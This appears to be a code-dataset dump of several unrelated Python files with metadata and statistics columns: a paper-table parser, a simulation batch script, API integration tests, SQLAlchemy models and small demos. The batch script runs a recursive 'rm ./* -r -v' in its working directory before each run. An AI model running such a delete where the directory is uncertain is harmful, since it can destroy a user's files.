| 24.555556 | 87 | 0.651584 | 74 | 663 | 5.513514 | 0.364865 | 0.098039 | 0.080882 | 0.132353 | 0.306373 | 0.151961 | 0 | 0 | 0 | 0 | 0 | 0 | 0.227753 | 663 | 26 | 88 | 25.5 | 0.796875 | 0.193062 | 0 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
981c530b54b5e146141b7d1224868de41fe435cb | 2,053 | py | Python | adscores/data/fcdd_2021_table2.py | jpcbertoldo/ad-scores | b106d5844d7dc5380ee8d7ce74d60b6e59aa8717 | [
"MIT"
] | null | null | null | adscores/data/fcdd_2021_table2.py | jpcbertoldo/ad-scores | b106d5844d7dc5380ee8d7ce74d60b6e59aa8717 | [
"MIT"
] | null | null | null | adscores/data/fcdd_2021_table2.py | jpcbertoldo/ad-scores | b106d5844d7dc5380ee8d7ce74d60b6e59aa8717 | [
"MIT"
] | null | null | null | """
from liznerski_explainable_2021
Liznerski, P., Ruff, L., Vandermeulen, R.A., Franks, B.J., Kloft, M., Muller, K.R., 2021. Explainable Deep One-Class Classification, in: International Conference on Learning Representations. Presented at the International Conference on Learning Representations.
Table 3
"""
from pathlib import Path
import pandas as pd
txt_fifle = Path(__file__).parent / "fcdd_2021_table2.txt" # contains the data part of the table above
str_data = txt_fifle.read_text()
nlines_per_group = 11
# this is in the order of the lines inside each group of 11 lines
METHODS_NAMES = [
"AE-SS", "AE-L2", "Ano-GAN", "CNNFD",
"VEVAE", "SMAI", "GDR", "P-NET",
"FCDD-unsupervised", "FCDD-semi-supervised",
]
lines = str_data.strip().split("\n")
line_groups = [
lines[(i * nlines_per_group):((i + 1) * nlines_per_group)]
for i in range(len(lines) // nlines_per_group)
]
line_groups = [
{
"class": g[0].lower().replace(" ", "-"),
**{
col: float(val)
for col, val in zip(METHODS_NAMES, g[1:])
},
}
for g in line_groups
]
df = pd.DataFrame.from_records(data=line_groups).set_index("class")
def get_aess():
return df[["AE-SS"]].rename(columns={"AE-SS": "score"})
def get_ael2():
return df[["AE-L2"]].rename(columns={"AE-L2": "score"})
def get_ano_gan():
return df[["Ano-GAN"]].rename(columns={"Ano-GAN": "score"})
def get_cnnfd():
return df[["CNNFD"]].rename(columns={"CNNFD": "score"})
def get_vevae():
return df[["VEVAE"]].rename(columns={"VEVAE": "score"})
def get_smai():
return df[["SMAI"]].rename(columns={"SMAI": "score"})
def get_gdr():
return df[["GDR"]].rename(columns={"GDR": "score"})
def get_pnet():
return df[["P-NET"]].rename(columns={"P-NET": "score"})
def get_fcdd_unsupervised():
return df[["FCDD-unsupervised"]].rename(columns={"FCDD-unsupervised": "score"})
def get_fcdd_semi_supervised():
return df[["FCDD-semi-supervised"]].rename(columns={"FCDD-semi-supervised": "score"})
| 24.73494 | 261 | 0.645397 | 289 | 2,053 | 4.435986 | 0.377163 | 0.046802 | 0.077223 | 0.051482 | 0.074883 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014646 | 0.168534 | 2,053 | 82 | 262 | 25.036585 | 0.73638 | 0.198734 | 0 | 0.043478 | 0 | 0 | 0.190942 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.217391 | false | 0 | 0.043478 | 0.217391 | 0.478261 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
e24ddfd08161c451b3ca37245fce6912c97295aa | 2,295 | py | Python | run/runPN4_Showcase.py | huppd/PINTimpact | 766b2ef4d2fa9e6727965e48a3fba7b752074850 | [
"MIT"
] | null | null | null | run/runPN4_Showcase.py | huppd/PINTimpact | 766b2ef4d2fa9e6727965e48a3fba7b752074850 | [
"MIT"
] | null | null | null | run/runPN4_Showcase.py | huppd/PINTimpact | 766b2ef4d2fa9e6727965e48a3fba7b752074850 | [
"MIT"
] | null | null | null | import os
import platform_paths as pp
EXE = 'peri_navier4'
os.chdir(pp.EXE_PATH)
os.system('make '+EXE+' -j4')
CASE_PATH = ['']*5
npx = 4
npy = 2
npt = 4
case_consts = ' --linSolName="GMRES" --piccard --flow=1 --domain=1 --force=1 --radius=0.1 --amp=0.1 --npx='+str(npx)+' --npy='+str(npy)+' --npt='+str(npt)+' --tolNOX=1.e-2 --tolBelos=1.e-1 --maxIter=20 --lx=4. --ly=2. --xm='+str(0.25) + ' '
precTypes = [0, 10]
ns = [4]
res = [10, 100, 200]
STS = [10, 100, 200]
fixTypes = [1, 2, 4, 6, 9, 10]
ns = [5]
precTypes = [0, 1, 2]
res = [200]
STS = [251]
fixTypes = [1]
for precType in precTypes:
CASE_PATH[0] = 'precType_'+str(precType)
if not os.path.exists(pp.DATA_PATH+CASE_PATH[0]):
os.mkdir(pp.DATA_PATH+CASE_PATH[0])
for n in ns:
CASE_PATH[1] = '/n2_'+str(n)
if not os.path.exists(pp.DATA_PATH+CASE_PATH[0]+CASE_PATH[1]):
os.mkdir(pp.DATA_PATH+CASE_PATH[0]+CASE_PATH[1])
for re in res:
CASE_PATH[2] = '/re_'+str(re)
if not os.path.exists(pp.DATA_PATH+CASE_PATH[0]+CASE_PATH[1]+CASE_PATH[2]):
os.mkdir(pp.DATA_PATH+CASE_PATH[0]+CASE_PATH[1]+CASE_PATH[2])
for st in STS:
CASE_PATH[3] = '/alpha2_'+str(st)
if not os.path.exists(pp.DATA_PATH+CASE_PATH[0]+CASE_PATH[1]+CASE_PATH[2]+CASE_PATH[3]):
os.mkdir(pp.DATA_PATH+CASE_PATH[0]+CASE_PATH[1]+CASE_PATH[2]+CASE_PATH[3])
for fixType in fixTypes:
CASE_PATH[4] = '/fixType_'+str(fixType)
if not os.path.exists(pp.DATA_PATH+CASE_PATH[0]+CASE_PATH[1]+CASE_PATH[2]+CASE_PATH[3]+CASE_PATH[4] ):
os.mkdir(pp.DATA_PATH+CASE_PATH[0]+CASE_PATH[1]+CASE_PATH[2]+CASE_PATH[3]+CASE_PATH[4])
os.chdir(pp.DATA_PATH+CASE_PATH[0]+CASE_PATH[1]+CASE_PATH[2]+CASE_PATH[3]+CASE_PATH[4])
os.system(' rm ./* -r -v ')
case_para = ' --precType='+str(precType)+' --nx='+str(2*2**n+1)+' --ny='+str(2**n+1)+' --nt='+str(2**(n-1)+1)+' --re='+str(re)+' --alpha2='+str(st)+' --fixType='+str(fixType)+' '
print case_consts + case_para
os.system(pp.exe_pre(npx*npy*npt,' -R lustre ')+pp.EXE_PATH+EXE+case_para+case_consts)
| 40.263158 | 244 | 0.566449 | 389 | 2,295 | 3.167095 | 0.200514 | 0.266234 | 0.087662 | 0.125 | 0.445617 | 0.445617 | 0.445617 | 0.445617 | 0.424513 | 0.424513 | 0 | 0.063914 | 0.22963 | 2,295 | 56 | 245 | 40.982143 | 0.632919 | 0 | 0 | 0 | 0 | 0.044444 | 0.137691 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.044444 | null | null | 0.022222 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e2610355b9b43f9a383451e16f9c38775057e984 | 8,878 | py | Python | tests/integration/models/test_project_contract.py | nethad/moco-wrapper | 012f9aab6e9fa60e3ccdf7254f0366b108651899 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | tests/integration/models/test_project_contract.py | nethad/moco-wrapper | 012f9aab6e9fa60e3ccdf7254f0366b108651899 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | tests/integration/models/test_project_contract.py | nethad/moco-wrapper | 012f9aab6e9fa60e3ccdf7254f0366b108651899 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | from moco_wrapper.util.response import JsonResponse, ListingResponse, EmptyResponse
import string
import random
from datetime import date
from .. import IntegrationTest
class TestProjectContract(IntegrationTest):
def get_unit(self):
with self.recorder.use_cassette("TestProjectContract.get_unit"):
unit = self.moco.Unit.getlist().items[0]
return unit
def get_customer(self):
with self.recorder.use_cassette("TestProjectContract.get_customer"):
customer_create = self.moco.Company.create(
"TestProjectContract",
company_type="customer"
)
return customer_create.data
def get_user(self):
with self.recorder.use_cassette("TestProjectContract.get_user"):
user = self.moco.User.getlist().items[0]
return user
def get_other_user(self):
unit = self.get_unit()
with self.recorder.use_cassette("TestProjectContract.get_other_user"):
user_create = self.moco.User.create(
"contract",
"user",
"{}@mycompany.com".format(self.id_generator()),
self.id_generator(),
unit.id,
active=True,
)
return user_create.data
def test_getlist(self):
user = self.get_user()
customer = self.get_customer()
with self.recorder.use_cassette("TestProjectContract.test_getlist"):
project_create = self.moco.Project.create(
"dummy project, test contract getlist",
"EUR",
date(2020, 1, 1),
user.id,
customer.id
)
contract_list = self.moco.ProjectContract.getlist(project_create.data.id)
assert project_create.response.status_code == 200
assert contract_list.response.status_code == 200
assert isinstance(contract_list, ListingResponse)
def test_create(self):
user = self.get_user()
customer = self.get_customer()
other_user = self.get_other_user() #created user for assigning to project
with self.recorder.use_cassette("TestProjectContract.test_create"):
project_create = self.moco.Project.create(
"dummy project, test contract create",
"EUR",
date(2020, 1, 1),
user.id,
customer.id
)
billable = False
active = True
budget = 9900
hourly_rate = 100
contract_create = self.moco.ProjectContract.create(
project_create.data.id,
other_user.id,
billable=billable,
active=active,
budget=budget,
hourly_rate=hourly_rate
)
assert project_create.response.status_code == 200
assert contract_create.response.status_code == 200
assert isinstance(project_create, JsonResponse)
assert isinstance(contract_create, JsonResponse)
assert contract_create.data.firstname == other_user.firstname
assert contract_create.data.lastname == other_user.lastname
assert contract_create.data.billable == billable
assert contract_create.data.budget == budget
assert contract_create.data.user_id == other_user.id
assert contract_create.data.hourly_rate == hourly_rate
assert contract_create.data.active == active
def test_get(self):
user = self.get_user()
customer = self.get_customer()
other_user = self.get_other_user() #created user for assigning to project
with self.recorder.use_cassette("TestProjectContract.test_get"):
project_create = self.moco.Project.create(
"dummy project, test contract get",
"EUR",
date(2020, 1, 1),
user.id,
customer.id
)
billable = False
active = True
budget = 9900
hourly_rate = 100
contract_create = self.moco.ProjectContract.create(
project_create.data.id,
other_user.id,
billable=billable,
active=active,
budget=budget,
hourly_rate=hourly_rate
)
contract_get = self.moco.ProjectContract.get(
project_create.data.id,
contract_create.data.id
)
assert project_create.response.status_code == 200
assert contract_create.response.status_code == 200
assert contract_get.response.status_code == 200
assert isinstance(project_create, JsonResponse)
assert isinstance(contract_create, JsonResponse)
assert isinstance(contract_get, JsonResponse)
assert contract_get.data.firstname == other_user.firstname
assert contract_get.data.lastname == other_user.lastname
assert contract_get.data.billable == billable
assert contract_get.data.budget == budget
assert contract_get.data.user_id == other_user.id
assert contract_get.data.hourly_rate == hourly_rate
assert contract_get.data.active == active
def test_update(self):
user = self.get_user()
customer = self.get_customer()
other_user = self.get_other_user() #created user for assigning to project
with self.recorder.use_cassette("TestProjectContract.test_update"):
project_create = self.moco.Project.create(
"dummy project, test contract update",
"EUR",
date(2020, 1, 1),
user.id,
customer.id
)
billable = False
active = True
budget = 9900.5
hourly_rate = 100.2
contract_create = self.moco.ProjectContract.create(
project_create.data.id,
other_user.id,
billable=True,
budget=1,
hourly_rate=2,
)
contract_update = self.moco.ProjectContract.update(
project_create.data.id,
contract_create.data.id,
billable=billable,
active=active,
budget=budget,
hourly_rate=hourly_rate
)
assert project_create.response.status_code == 200
assert contract_create.response.status_code == 200
assert contract_update.response.status_code == 200
assert isinstance(project_create, JsonResponse)
assert isinstance(contract_create, JsonResponse)
assert isinstance(contract_update, JsonResponse)
assert contract_update.data.firstname == other_user.firstname
assert contract_update.data.lastname == other_user.lastname
assert contract_update.data.billable == billable
assert contract_update.data.budget == budget
assert contract_update.data.user_id == other_user.id
assert contract_update.data.hourly_rate == hourly_rate
assert contract_update.data.active == active
def test_delete(self):
user = self.get_user()
customer = self.get_customer()
other_user = self.get_other_user() #created user for assigning to project
with self.recorder.use_cassette("TestProjectContract.test_delete"):
project_create = self.moco.Project.create(
"dummy project, test contract get",
"EUR",
date(2020, 1, 1),
user.id,
customer.id
)
billable = False
active = True
budget = 9900
hourly_rate = 100
contract_create = self.moco.ProjectContract.create(
project_create.data.id,
other_user.id,
billable=billable,
active=active,
budget=budget,
hourly_rate=hourly_rate
)
contract_delete = self.moco.ProjectContract.delete(
project_create.data.id,
contract_create.data.id
)
assert project_create.response.status_code == 200
assert contract_create.response.status_code == 200
assert contract_delete.response.status_code == 204
assert isinstance(project_create, JsonResponse)
assert isinstance(contract_create, JsonResponse)
assert isinstance(contract_delete, EmptyResponse) | 35.798387 | 85 | 0.579072 | 875 | 8,878 | 5.672 | 0.084571 | 0.081805 | 0.047149 | 0.050776 | 0.774935 | 0.722345 | 0.71489 | 0.618779 | 0.55813 | 0.543824 | 0 | 0.017753 | 0.346474 | 8,878 | 248 | 86 | 35.798387 | 0.837642 | 0.01667 | 0 | 0.519802 | 0 | 0 | 0.059012 | 0.031511 | 0 | 0 | 0 | 0 | 0.227723 | 1 | 0.044554 | false | 0 | 0.024752 | 0 | 0.094059 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e26895fab97d6a8d6c9b0aadc9242bf75f68e582 | 3,369 | py | Python | ExperimentManagement/dummy_trainer.py | CKhan1/READ-PSB-AI-right-whale-photo-id-Kaggle | b6723724148029f68187bbd7ac598ea90a7542f3 | [
"MIT"
] | 2 | 2020-08-19T11:03:42.000Z | 2022-02-18T02:49:28.000Z | ExperimentManagement/dummy_trainer.py | X10Khan/whales | 313fd487dec6080bb3a518d312cd9f1e29958f16 | [
"MIT"
] | null | null | null | ExperimentManagement/dummy_trainer.py | X10Khan/whales | 313fd487dec6080bb3a518d312cd9f1e29958f16 | [
"MIT"
] | 4 | 2018-10-23T15:47:22.000Z | 2021-02-03T03:35:13.000Z | import argparse
import copy
import os
from bunch import Bunch
from mock import Mock
import sys
import re
from ml_utils import id_generator, TimeSeries, LogTimeseriesObserver
def create_mock():
return Mock()
class DummyUrlTranslator(object):
def url_to_path(self, url):
return url
def path_to_url(self, path):
return path
class DummyTrainer(object):
def __init__(self):
pass
def get_url_translator(self):
return DummyUrlTranslator()
def transform_urls_to_paths(self, args):
regex = re.compile('.*_url$')
keys = copy.copy(vars(args))
for arg in keys:
if regex.match(arg):
new_arg = re.sub('_url$', '_path', arg)
setattr(args, new_arg, getattr(args, arg))
return args
def _create_timeseries_and_figures(self, channels, figures_schema, *args, **kwargs):
ts = Bunch()
for ts_name in channels:
ts.__setattr__(ts_name, TimeSeries())
for figure_title, l in figures_schema.iteritems():
for idx, (ts_name, line_name, mean_freq) in enumerate(l):
observer = LogTimeseriesObserver(name=ts_name + ':' + line_name, add_freq=mean_freq)
getattr(ts, ts_name).add_add_observer(observer)
return ts
def save_model(self, model, file_name):
print 'ModelPath', file_name
model_path = self.saver.save_train_state_new(model, file_name)
return model_path
def init_command_receiver(self, *args, **kwargs):
self.command_receiver = create_mock()
def create_bokeh_session(self):
pass
def start_exit_handler_thread(self, *args):
pass
def stop_exit_handler_thread(self):
pass
def create_control_parser(self, default_owner):
parser = argparse.ArgumentParser(description='TODO', fromfile_prefix_chars='@')
parser.add_argument('--exp-dir-url', type=str, default=None, help='TODO')
parser.add_argument('--exp-parent-dir-url', type=str, default=None, help='TODO')
return parser
def main(self, *args, **kwargs):
parser = self.create_parser()
control_parser = self.create_control_parser(default_owner='a')
control_args, prog_argv = control_parser.parse_known_args(sys.argv[1:])
control_args = self.transform_urls_to_paths(control_args)
prog_args = self.transform_urls_to_paths(parser.parse_args(prog_argv))
print vars(control_args)
if control_args.exp_dir_path:
exp_dir_path = control_args.exp_dir_path
elif control_args.exp_parent_dir_path:
exp_dir_path = os.path.join(control_args.exp_parent_dir_path, '{random_id}'.format(
random_id=id_generator(5),
)
)
else:
raise RuntimeError('exp_dir_path is not present!!!')
exp = Mock()
self.go(exp, prog_args, exp_dir_path)
def install_sigterm_handler(self):
pass
# The user have to define go function
def go(self, exp, args, exp_dir_path):
raise NotImplementedError()
def create_timeseries_and_figures(self):
raise NotImplementedError()
@classmethod
def create_parser(cls):
parser = argparse.ArgumentParser(description='TODO', fromfile_prefix_chars='@')
return parser | 30.908257 | 100 | 0.655684 | 428 | 3,369 | 4.857477 | 0.301402 | 0.030303 | 0.03367 | 0.026936 | 0.204906 | 0.175084 | 0.090428 | 0.090428 | 0 | 0 | 0 | 0.00079 | 0.248442 | 3,369 | 109 | 101 | 30.908257 | 0.8203 | 0.010389 | 0 | 0.134146 | 0 | 0 | 0.036004 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.060976 | 0.097561 | null | null | 0.02439 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
e26bf8c2f915d4db3512c9b8a8e20ed0ced8fc7a | 3,535 | py | Python | app/database/tables.py | victor-iyi/heart-disease | 06540b582e8752d2bb6a32366077872d32d7c0e4 | [
"MIT"
] | 1 | 2021-06-20T09:08:26.000Z | 2021-06-20T09:08:26.000Z | app/database/tables.py | victor-iyi/heart-disease | 06540b582e8752d2bb6a32366077872d32d7c0e4 | [
"MIT"
] | null | null | null | app/database/tables.py | victor-iyi/heart-disease | 06540b582e8752d2bb6a32366077872d32d7c0e4 | [
"MIT"
] | null | null | null | # Copyright 2021 Victor I. Afolabi
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from passlib.context import CryptContext
from sqlalchemy import Column, DateTime, Enum
from sqlalchemy import Integer, Numeric, String, Text
from app.database import Base
class Category(Enum):
patient = 'Patient'
practitioner = 'Medical Practitioner'
class User(Base):
__tablename__ = 'user'
# User ID column.
id = Column(Integer, primary_key=True, index=True)
email = Column(String, unique=True, index=True)
password_hash = Column(String(64), nullable=False)
first_name = Column(String(32), index=True)
last_name = Column(String(32), index=True)
category = Column(Category, index=True,
nullable=False,
default=Category.patient)
__mapper_args__ = {
'polymorphic_identity': 'user',
'polymorphic_on': category,
}
# Password context.
pwd_context = CryptContext(schemes=['bcrypt'], deprecated='auto')
def __repr__(self) -> str:
return f'User({self.email}, {self.category})'
@staticmethod
def hash_password(password: str) -> str:
return User.pwd_context.hash(password)
@staticmethod
def verify_password(password: str, hash_password: str) -> bool:
return User.pwd_context.verify(password, hash_password)
class Patient(User):
# Patient info.
age = Column(Integer)
contact = Column(String(15), index=True)
history = Column(Text)
aliment = Column(Text)
last_visit_diagnosis = Column(DateTime)
guardian_fullname = Column(String(64))
guardian_email = Column(String)
guardian_phone = Column(String(15))
occurences_of_illness = Column(Text)
last_treatment = Column(DateTime)
__mapper_args__ = {
'polymorphic_identity': 'patient',
'inherit_condition': User.category == Category.patient
}
def __repr__(self) -> str:
return f'Patient({self.email})'
class Practitoner(User):
practitioner_data = Column(String)
__mapper_args__ = {
'polymorphic_identity': 'practitioner',
'inherit_condition': User.category == Category.practitioner
}
def __repr__(self) -> str:
return f'Practitioner({self.email})'
class Feature(Base):
__tablename__ = 'features'
# Primary key.
id = Column(Integer, primary_key=True, index=True)
# Features.
age = Column(Integer, nullable=False)
sex = Column(Integer, nullable=False)
cp = Column(Integer, nullable=False)
trestbps = Column(Integer, nullable=False)
chol = Column(Integer, nullable=False)
fbs = Column(Integer, nullable=False)
restecg = Column(Integer, nullable=False)
thalach = Column(Integer, nullable=False)
exang = Column(Integer, nullable=False)
oldpeak = Column(Numeric, nullable=False)
slope = Column(Integer, nullable=False)
ca = Column(Integer, nullable=False)
thal = Column(Integer, nullable=False)
# Target.
target = Column(Integer, nullable=True)
| 29.458333 | 74 | 0.686846 | 417 | 3,535 | 5.673861 | 0.371703 | 0.087912 | 0.115385 | 0.131868 | 0.112003 | 0.081572 | 0.032122 | 0.032122 | 0 | 0 | 0 | 0.007151 | 0.208769 | 3,535 | 119 | 75 | 29.705882 | 0.838756 | 0.179066 | 0 | 0.138889 | 0 | 0 | 0.090909 | 0.016308 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069444 | false | 0.083333 | 0.055556 | 0.069444 | 0.819444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
e2746841518d72ff1c015f3f7d541ed3f743e448 | 420 | py | Python | examples/rest-api-python/src/db/notes.py | drewfish/serverless-stack | 155353ed7daf3ba2d4daeb9096f6c7638cb404fc | [
"MIT"
] | 5,922 | 2020-08-19T05:27:43.000Z | 2022-03-31T23:29:17.000Z | examples/rest-api-python/src/db/notes.py | Dzan001/serverless-stack | 69fb992f31ac098b644f50cbddf3aaec4db054cd | [
"MIT"
] | 980 | 2020-09-17T03:09:42.000Z | 2022-03-31T20:21:43.000Z | examples/rest-api-python/src/db/notes.py | Dzan001/serverless-stack | 69fb992f31ac098b644f50cbddf3aaec4db054cd | [
"MIT"
] | 458 | 2020-09-02T13:47:17.000Z | 2022-03-31T12:14:32.000Z | import time
import numpy
def getNotes():
return {
"id1": {
"noteId": "id1",
"userId": "user1",
"content": str(numpy.array([1,2,3,4])),
"createdAt": int(time.time()),
},
"id2": {
"noteId": "id2",
"userId": "user2",
"content": str(numpy.array([5,6,7,8])),
"createdAt": int(time.time()-1000),
},
}
| 22.105263 | 51 | 0.419048 | 42 | 420 | 4.190476 | 0.619048 | 0.113636 | 0.170455 | 0.227273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068182 | 0.371429 | 420 | 18 | 52 | 23.333333 | 0.598485 | 0 | 0 | 0 | 0 | 0 | 0.185714 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | true | 0 | 0.117647 | 0.058824 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e27e4a43c502f420400f007b448a9524041c88b3 | 178 | py | Python | src/news/urls.py | HammudElHammud/newspage | feac69bf0fa3dd6c876e88ef0daae4166b367c09 | [
"bzip2-1.0.6"
] | null | null | null | src/news/urls.py | HammudElHammud/newspage | feac69bf0fa3dd6c876e88ef0daae4166b367c09 | [
"bzip2-1.0.6"
] | null | null | null | src/news/urls.py | HammudElHammud/newspage | feac69bf0fa3dd6c876e88ef0daae4166b367c09 | [
"bzip2-1.0.6"
] | null | null | null | from django.contrib import admin
from django.conf.urls import url
from . import views
urlpatterns = {
url(r'^news/(?<pk>\d+)/$', views.news_datile, name='news_datile'),
} | 17.8 | 70 | 0.691011 | 26 | 178 | 4.653846 | 0.615385 | 0.165289 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.146067 | 178 | 10 | 71 | 17.8 | 0.796053 | 0 | 0 | 0 | 0 | 0 | 0.162011 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
e2a191a08714abb0c42a3d02f6d08d58d245f102 | 709 | py | Python | src/pyterpreter/FunctionCallable.py | kinshukk/pyterpreter | 8c1029322da82dde8f39d8e26c1d5748242c14c7 | [
"MIT"
] | 4 | 2020-02-12T22:46:00.000Z | 2020-10-16T17:25:13.000Z | src/pyterpreter/FunctionCallable.py | kinshukk/pyterpreter | 8c1029322da82dde8f39d8e26c1d5748242c14c7 | [
"MIT"
] | null | null | null | src/pyterpreter/FunctionCallable.py | kinshukk/pyterpreter | 8c1029322da82dde8f39d8e26c1d5748242c14c7 | [
"MIT"
] | 1 | 2020-02-18T15:35:19.000Z | 2020-02-18T15:35:19.000Z | from Callable import Callable
from Environment import Environment
class FunctionCallable(Callable):
def __init__(self, declaration):
self.declaration = declaration
def arity(self):
return len(self.declaration.params)
def call(self, interpreter, arguments):
environment = Environment(enclosing=interpreter.globals)
#bind parameter names to passed arguments
for param_token, arg in zip(self.declaration.params, arguments):
environment.define(param_token.lexeme, arg)
interpreter.executeBlock(self.declaration.body, environment)
return None
def __str__(self):
return f"<Function '{self.declaration.name.lexeme}'>"
| 30.826087 | 72 | 0.708039 | 76 | 709 | 6.473684 | 0.513158 | 0.182927 | 0.085366 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.208745 | 709 | 22 | 73 | 32.227273 | 0.877005 | 0.056417 | 0 | 0 | 0 | 0 | 0.064371 | 0.049401 | 0 | 0 | 0 | 0 | 0 | 1 | 0.266667 | false | 0 | 0.133333 | 0.133333 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
e2a240ee665e131c6a1630bc56d30e02d74a542a | 453 | py | Python | drawing-shapes/drawing-rectangle.py | woosal1337/cv2 | cae4ad1e3ba4259507acde4db74559a726b09281 | [
"MIT"
] | 39 | 2021-11-08T13:35:10.000Z | 2022-01-20T19:45:17.000Z | drawing-shapes/drawing-rectangle.py | woosal1337/cv2 | cae4ad1e3ba4259507acde4db74559a726b09281 | [
"MIT"
] | null | null | null | drawing-shapes/drawing-rectangle.py | woosal1337/cv2 | cae4ad1e3ba4259507acde4db74559a726b09281 | [
"MIT"
] | 2 | 2021-11-17T01:24:39.000Z | 2022-02-02T00:40:33.000Z | import cv2
image_path = "../assets/img.png"
image = cv2.imread(image_path)
image = cv2.resize(image, (int(image.shape[0] * 0.5), int(image.shape[1] * 0.5)))
image_shape = image.shape
point1 = (int(image_shape[0] * 0.1), int(image_shape[1] * 0.1))
point2 = (int(image_shape[0] * 0.9), int(image_shape[1] * 0.9))
cv2.rectangle(image, point1, point2, (0, 255, 0), thickness=2)
cv2.imshow("Reading Image", image)
cv2.waitKey(0)
cv2.destroyAllWindows()
| 26.647059 | 81 | 0.679912 | 78 | 453 | 3.858974 | 0.320513 | 0.265781 | 0.259136 | 0.139535 | 0.299003 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09 | 0.116998 | 453 | 16 | 82 | 28.3125 | 0.6625 | 0 | 0 | 0 | 0 | 0 | 0.066225 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e2b97d3033bb3ab214296b1900d6c7a5c6a11ed2 | 284 | py | Python | src/python_op3/vision_comm/vision_tracking.py | culdo/python-op3 | 59a068ae4c8694778126aebc2ab553963b82493b | [
"MIT"
] | 5 | 2019-08-06T07:28:10.000Z | 2022-01-30T17:00:41.000Z | src/python_op3/vision_comm/vision_tracking.py | culdo/python-op3 | 59a068ae4c8694778126aebc2ab553963b82493b | [
"MIT"
] | 2 | 2019-08-06T15:54:42.000Z | 2021-04-21T02:40:36.000Z | src/python_op3/vision_comm/vision_tracking.py | culdo/python-op3 | 59a068ae4c8694778126aebc2ab553963b82493b | [
"MIT"
] | 5 | 2020-09-25T10:03:51.000Z | 2021-10-18T06:19:43.000Z | import rospy
from geometry_msgs.msg import Point
from std_msgs.msg import String
class VisionTrack:
def __init__(self, ns):
